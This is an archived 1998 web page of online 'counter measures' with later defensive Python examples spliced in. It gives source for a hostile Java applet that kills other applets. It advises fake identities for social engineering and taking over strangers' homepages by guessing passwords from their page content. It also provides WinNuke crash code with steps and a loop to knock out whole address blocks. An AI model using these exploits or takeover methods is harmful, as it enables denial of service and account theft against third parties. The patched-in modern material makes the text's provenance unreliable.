fravia's counter measures page
Fravia's Nofrill Web design (1998), updated July 1998
Fravia's Counter measures: Learn how to defend yourself
Sections: Applets killers | Fake identities | Homepages low capering | Enemy studying | Spammers nuking | Powersearching
"...these days, on the Web, you'll never be too careful, travel always through your cloak identities and with your applets killer on, keep your cache empty, watch out for cookies and do not bump too oft on wizard sites... Work well, +ORC"
/* This hostile applet stops any applets that are running and kills any
   other applets that are downloaded. */
import java.applet.*;
import java.awt.*;
import java.io.*;

public class AppletKiller extends java.applet.Applet implements Runnable {
    Thread killer;

    public void init() {
        killer = null;
    }

    public void start() {
        if (killer == null) {
            killer = new Thread(this, "killer");
            killer.setPriority(Thread.MAX_PRIORITY);
            killer.start();
        }
    }

    public void stop() {}

    // Kill all threads except this one
    public void run() {
        try {
            while (true) {
                ThreadKiller.killAllThreads();
                // sleep() is static: call it on the class, not on the killer instance
                try { Thread.sleep(100); }
                catch (InterruptedException e) {}
            }
        }
        catch (ThreadDeath td) {}
        // Resurrect the hostile thread in case of accidental ThreadDeath
        finally {
            AppletKiller ack = new AppletKiller();
            Thread reborn = new Thread(ack, "killer");
            reborn.start();
        }
    }
}

class ThreadKiller {
    // Ascend to the root ThreadGroup and list all subgroups recursively,
    // killing all threads as we go
    public static void killAllThreads() {
        ThreadGroup thisGroup;
        ThreadGroup topGroup;
        ThreadGroup parentGroup;

        // Determine the current thread group
        thisGroup = Thread.currentThread().getThreadGroup();

        // Proceed to the top ThreadGroup
        topGroup = thisGroup;
        parentGroup = topGroup.getParent();
        while (parentGroup != null) {
            topGroup = parentGroup;
            parentGroup = parentGroup.getParent();
        }

        // Find all subgroups recursively
        findGroups(topGroup);
    }

    private static void findGroups(ThreadGroup g) {
        if (g == null) { return; }
        else {
            int numThreads = g.activeCount();
            int numGroups = g.activeGroupCount();
            Thread[] threads = new Thread[numThreads];
            ThreadGroup[] groups = new ThreadGroup[numGroups];
            g.enumerate(threads, false);
            g.enumerate(groups, false);
            // The loops below were cut off in the page's listing and are
            // reconstructed from the comments above: stop every thread in this
            // group except the killer itself, then recurse into the subgroups.
            // Note that Thread.stop() has been deprecated since Java 1.2 and
            // throws UnsupportedOperationException in current JDKs, and no
            // current browser runs applets at all; this is 1998 code.
            for (int i = 0; i < numThreads; i++) {
                if (threads[i] != null && threads[i] != Thread.currentThread()) {
                    threads[i].stop();
                }
            }
            for (int i = 0; i < numGroups; i++) {
                findGroups(groups[i]);
            }
        }
    }
}
Well yes, you should learn a little Java my dear
__Fake Identities__
Having many identities (Avatars) is of paramount importance on the Web. You should use faked identities
for most activities; a good idea is to have identities in different languages (say a German
law student, a French volleyball enthusiast, and an American young Boy Scout). You'll be able to
get as many identities as you need using all the services that provide (per telnet) email addresses for free,
like hotmail.com... but a much better (and recommended) method is the homepage capering
I describe below. As soon as you have your fake email address, set up a free web page
(on Angelfire for instance,
but there are now many more free page providers on the Web, and you can get a 5 Megabyte free
page on many new free European providers). Be creative and use a "front" page that would not
arouse any suspicion (put up a nice photo you found somewhere on the Web with "Me and my Dog
Barkie" and this kind
of junk stuff). Remember that the Web is still growing exponentially and that MILLIONS of pages appear and
disappear every DAY! No censor's robot or spider can really follow what's going on (fortunately).
The Web is immense and the chances are on our side.
If you only spent a minute per page and devoted ten hours a day to it, it would take four and a
half years to explore a million Web pages, and a lifetime to explore just a part of the Web; an automated search engine
can do the same in two days, but in that time quite a lot of these pages will have been changed, moved or migrated.
Once you have some identities (say three or four) remember that:
- Your Avatars' interests should be VERY different
- If possible the language you use should be different for each Avatar (if you know only English use
at least different language patterns, say university professor as A and lorry driver as B)
What's the point of having many identities?
You'll need the Avatars to practise some nice Web activities (offensive and defensive):
- enemy studying (see below)
- social engineering (if you need something or if you want to get more info about a target)
- intranet activities (see below)
- homepage high capering (see below)
Homepages ("low") capering
For simple capering you do not even need a fake identity, and
you may practise it on many "easy" targets on the net. Capering is one of the best methods to conceal your identity; use the following approach:
- Find a free page provider with an easy password validation scheme (say Angelfire, but Geocities and
Mygale can also be used)
- Read many pages of people that are NOT computer experts and that do NOT update very often (if ever)... you may be able to find the
updating schedule on the free provider's pages.
- Let's say that the content of three such pages
is the following: "Me and my dog Bertie", "This page is a tribute
to my nice daughter Simona" and "I love lollypops".
- Try "capering" these pages using as passwords, respectively, Bertie, Simona and Lollypop.
You'll get -on average- one bingo out of 15 tries. Now you have some pages belonging to somebody else: do some of the following
(mixing the points as needs be):
1) Do not change the page, change only the password and leave it alone for a couple of months
and/or
2) Migrate immediately to another location
and/or
3) Change password
and/or
4) Use the email address of the page owner to get other free pages by other providers
and/or
5) Kill the page you capered
and/or
6) Repeat the same procedure twice
Now you'll have some "capered" pages that you can more safely (but not completely) use as
- "Depot" pages
- "Dormant" pages
- "Trap" (Luring) pages
for your own "intranet" (sort of, see below)
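The guess described above works only because the owner chose a password that is literally printed on the page. The defensive counterpart, as an added example that is not from the original page, is the sign-up check a free-page provider could run: reject any password that is just a word of the user's own page (case, trailing digits, punctuation and a plural "s" aside) or that is too short. The sample pages and passwords are constructed here, and the 12-character minimum is an assumption of this example.

```python
import re

# Constructed sample pages (not from the original text): the kind of "front"
# page the text describes, each paired with the password its owner picked.
SAMPLE_PAGES = {
    "Me and my dog Bertie": "Bertie",
    "This page is a tribute to my nice daughter Simona": "simona1",
    "I love lollypops": "Xk7!pq9#Lmz2",
}

# Assumed policy value for this example.
MIN_LENGTH = 12


def page_words(page_text: str) -> set:
    """Lower-cased words of the page long enough to serve as a password stem."""
    words = re.findall(r"[a-z]+", page_text.lower())
    return {w for w in words if len(w) >= 3}


def password_stem(password: str) -> str:
    """Letters only, lower-cased: 'Simona1', 'lollypop!' and 'Bertie' become
    'simona', 'lollypop' and 'bertie', the forms a guesser would try."""
    return re.sub(r"[^a-z]", "", password.lower())


def is_derived_from_page(password: str, page_text: str) -> bool:
    """True when the password is a word of the owner's own page, allowing for
    case, trailing digits/punctuation and a plural 's' (lollypop/lollypops)."""
    stem = password_stem(password)
    if not stem:
        return False  # purely numeric or symbolic: not a page word
    words = page_words(page_text)
    variants = {stem, stem + "s"}
    if stem.endswith("s"):
        variants.add(stem[:-1])
    return any(v in words for v in variants)


def check_password(password: str, page_text: str) -> list:
    """Sign-up policy a free-page host could apply. Returns the reasons the
    password is rejected; an empty list means it is accepted."""
    reasons = []
    if len(password) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    if is_derived_from_page(password, page_text):
        reasons.append("is a word of your own page")
    return reasons


if __name__ == "__main__":
    for page, pw in SAMPLE_PAGES.items():
        print(f"{page!r}: {pw!r} -> {check_password(pw, page) or 'accepted'}")
```

The check is deliberately run against the page text the user submits, not a generic dictionary: the first thing the provider knows about a new owner is what they wrote on their own front page, and that is exactly the word list the text says gets tried first.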
__Enemy identification__
Know your enemies! (How to gather information on the Web)
You'll find a first approach on the ad hoc enemy page
__How to Nuke spammers__
a nice fine C program (WinNuke) by _eci... listing at the end of this section
How to use WinNuke to get rid of spammers
winnuke.c is a program which will crash any Windows 95/NT machine. Since
this operating system is popular among spammers, winnuke makes it easy to
get rid of them.
First, take the program code from the bottom of this post (everything
after the ---Cut Here--- line) and save it to a text file called winnuke.c
on your shell account or Linux box.
Now compile it by typing:
gcc winnuke.c -o winnuke
If you have SunOS, you may need to use this command instead:
gcc winnuke.c -lsocket -lnsl -o winnuke
You should now have an executable program called winnuke in your directory.
Now find the spammer's IP number. This is the first IP number in the mail
headers which is not your mail server or mail relay. Once you have the
spammer's IP number (eg 192.168.12.109) type: ./winnuke 192.168.12.109
except use the spammer's real IP number that you found. You should see
something like the following:
% ./winnuke 192.168.12.109
Connected to [192.168.12.109:139].
Sending crash... Done!
%
Congratulations! You just nuked a spammer! Give yourself a pat on the
back. You can ping the IP address to verify that it is actually down.
If it doesn't work...
Unfortunately a few spammers don't have just one IP address but a whole
block (255 addresses). In this case you will need to nuke the entire block.
To do this, use this script:
#!/bin/csh
@ number = 255
loop:
    @ number = $number - 1
    ./winnuke 205.199.212.$number &
    #sleep 1
    if ($number > 1) then
        goto loop
    endif
Except you should use the first three bytes of the spammer's IP number
instead of 205.199.212. If your net connection is too slow, uncomment the
sleep command (line 6) and that will slow it down so it can get all the
packets out. That's it...
---Cut Here---
/* winnuke.c - (05/07/97) By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
#include <stdio.h>
#include <stdlib.h>         /* exit() */
#include <string.h>
#include <strings.h>        /* bzero(), bcopy() */
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>      /* inet_addr() */
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#define dport 139 /* Attack port: 139 is what we want */

int x, s;
char *str = "Bye"; /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;

int open_sock(int sock, char *server, int port) {
    struct sockaddr_in blah;
    struct hostent *he;

    bzero((char *)&blah, sizeof(blah));
    blah.sin_family = AF_INET;
    blah.sin_addr.s_addr = inet_addr(server);
    blah.sin_port = htons(port);

    if ((he = gethostbyname(server)) != NULL) {
        bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
    }
    else {
        /* inet_addr() returns an unsigned in_addr_t, so the listing's "< 0"
           test could never fire; INADDR_NONE is the documented failure value */
        if ((blah.sin_addr.s_addr = inet_addr(server)) == INADDR_NONE) {
            perror("gethostbyname()");
            return(-3);
        }
    }
    if (connect(sock, (struct sockaddr *)&blah, sizeof(blah)) == -1) {
        perror("connect()");
        close(sock);
        return(-4);
    }
    printf("Connected to [%s:%d].\n", server, port);
    return(0);
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <target>\n", argv[0]);
        exit(0);
    }
    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
    }
    open_sock(s, argv[1], dport);
    printf("Sending crash... ");
    /* MSG_OOB: one byte of TCP "urgent" data, i.e. a segment with URG set */
    send(s, str, strlen(str), MSG_OOB);
    usleep(500000);
    printf("Done!\n");
    close(s);
    return 0;
}
nice, isn't it?
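Finding the originating IP from the mail headers, as the post above describes, is the same step an abuse desk takes before filing a report with the origin network's abuse contact or adding the address to a blocklist. The following is an added example, not part of the original page or of _eci's post: it reads the Received: lines from the top (each relay prepends its own), keeps only the bracketed address that the receiving server itself recorded, and returns the first one outside our own networks. The message, the host names and the trusted network 192.0.2.0/24 are constructed; the hop below the trust boundary is the one a spammer controls, so its Received: line is shown forged on purpose.

```python
import email
import ipaddress
import re
from email import policy

# Constructed sample (not from the original post). Each relay prepends its own
# Received: line, so the top line is our own MX, the next is what handed the
# message to us, and anything below that was written on the sender's side.
SAMPLE_MESSAGE = """\
Received: from relay.example.net (relay.example.net [192.0.2.10])
\tby mx.example.net with ESMTP id 12345; Mon, 6 Jul 1998 10:00:05 +0000
Received: from spamhost.invalid (unknown [203.0.113.45])
\tby relay.example.net with SMTP; Mon, 6 Jul 1998 10:00:01 +0000
Received: from forged.example.org ([198.51.100.77])
\tby spamhost.invalid; Mon, 6 Jul 1998 09:59:00 +0000
From: someone@example.org
To: victim@example.net
Subject: MAKE MONEY FAST

Buy now.
"""

# Constructed: the address space of our own mail servers and relays.
TRUSTED_NETWORKS = ["192.0.2.0/24"]

# "[a.b.c.d]" in a Received: line is the address the receiving MTA saw on the
# socket, the one part of the line the sender could not choose.
_BRACKETED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def received_ips(raw_message: str) -> list:
    """Connecting IP of every Received: header, newest (top of message) first."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    ips = []
    for hdr in msg.get_all("Received", []):
        m = _BRACKETED_IP.search(str(hdr))
        if m:
            ips.append(m.group(1))
    return ips


def originating_ip(raw_message: str, trusted=TRUSTED_NETWORKS):
    """The post's rule: the first IP, reading from the top, that is not one of
    our own servers or relays. That host handed the message to us and is what
    an abuse report or blocklist entry should name; Received: lines below it
    were written by the sender's side and may be forged, so they are ignored."""
    nets = [ipaddress.ip_network(n) for n in trusted]
    for ip in received_ips(raw_message):
        addr = ipaddress.ip_address(ip)
        if not any(addr in net for net in nets):
            return ip
    return None


if __name__ == "__main__":
    print("hops:", received_ips(SAMPLE_MESSAGE))
    print("origin:", originating_ip(SAMPLE_MESSAGE))
```

The trusted list matters: if your provider's outbound relay is missing from it, the function stops one hop too early and names your own relay.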
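What winnuke.c actually puts on the wire is a single TCP segment to port 139 with the URG flag set and a non-zero urgent pointer (that is what MSG_OOB does); the bug was in how the Windows 95/NT NetBIOS stack of the day handled that urgent data, and Microsoft patched it in 1997. The defender's side of it, as an added example that is not from the original page or from _eci, is a parser for a raw IPv4/TCP packet plus the check an intrusion detector used for this attack: URG-flagged data aimed at the NetBIOS ports. The build_packet helper only assembles constructed test vectors in memory (checksums left zero, nothing is sent) so the parser can be exercised offline; the port set and sample addresses are this example's assumptions.

```python
import ipaddress
import struct

# Ports the NetBIOS-over-TCP service listened on; 139 is the one winnuke targets.
NETBIOS_PORTS = {137, 138, 139}
# TCP flag bits, found in the low 9 bits of the data-offset/flags word
TCP_URG, TCP_ACK, TCP_PSH, TCP_SYN = 0x20, 0x10, 0x08, 0x02


def parse_ipv4_tcp(packet: bytes):
    """Parse an IPv4 header followed by a TCP header. Returns a dict of the
    fields the check needs, or None when the bytes are too short, not IPv4,
    or not TCP."""
    if len(packet) < 20:
        return None
    (ver_ihl, _tos, _total, _ident, _frag, _ttl, proto, _csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    if ver_ihl >> 4 != 4 or proto != 6:
        return None
    ihl = (ver_ihl & 0x0F) * 4
    if ihl < 20 or len(packet) < ihl + 20:
        return None
    (sport, dport, _seq, _ack, off_flags, _win, _tcsum,
     urg_ptr) = struct.unpack("!HHIIHHHH", packet[ihl:ihl + 20])
    data_off = (off_flags >> 12) * 4
    return {
        "src": str(ipaddress.IPv4Address(src)),
        "dst": str(ipaddress.IPv4Address(dst)),
        "sport": sport,
        "dport": dport,
        "flags": off_flags & 0x01FF,
        "urg_ptr": urg_ptr,
        "payload": packet[ihl + data_off:],
    }


def is_oob_netbios(packet: bytes) -> bool:
    """The signature: urgent (URG-flagged) data sent to a NetBIOS port."""
    p = parse_ipv4_tcp(packet)
    return (p is not None and p["dport"] in NETBIOS_PORTS
            and bool(p["flags"] & TCP_URG) and p["urg_ptr"] > 0)


def alerts(packets) -> list:
    """Run the check over a capture and describe each hit."""
    out = []
    for pkt in packets:
        if is_oob_netbios(pkt):
            p = parse_ipv4_tcp(pkt)
            out.append(f"OOB data to NetBIOS: {p['src']}:{p['sport']} -> "
                       f"{p['dst']}:{p['dport']} ({len(p['payload'])} urgent bytes)")
    return out


def build_packet(src, dst, sport, dport, flags, urg_ptr, payload=b""):
    """Assemble a constructed IPv4+TCP test vector in memory (checksums zero,
    nothing is sent) so the parser can be exercised offline."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                         ipaddress.IPv4Address(src).packed,
                         ipaddress.IPv4Address(dst).packed)
    tcp_hdr = struct.pack("!HHIIHHHH", sport, dport, 1, 1, (5 << 12) | flags,
                          8192, 0, urg_ptr)
    return ip_hdr + tcp_hdr + payload


if __name__ == "__main__":
    # Constructed capture: one winnuke-style segment, one ordinary SYN to 139,
    # one URG segment to a web port (irrelevant to NetBIOS).
    capture = [
        build_packet("203.0.113.9", "192.0.2.5", 40000, 139, TCP_URG | TCP_PSH | TCP_ACK, 3, b"Bye"),
        build_packet("203.0.113.9", "192.0.2.5", 40001, 139, TCP_SYN, 0),
        build_packet("203.0.113.9", "192.0.2.5", 40002, 80, TCP_URG | TCP_ACK, 1, b"X"),
    ]
    for line in alerts(capture):
        print(line)
```

A hit on this rule from the Internet side is mostly a sign that ports 137-139 are reachable from outside at all, which is the thing to fix; a patched host simply discards the urgent byte.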
To: Email-Queries@Reference.COM
Subject: (None)
Text: FIND search AND engines
Try it now, you'll get an answer in circa half an hour.

To: agora@dna.affrc.go.jp
Subject: (None)
Text: send news:alt.anonymous
Try it now, you'll get an answer in circa 10 minutes.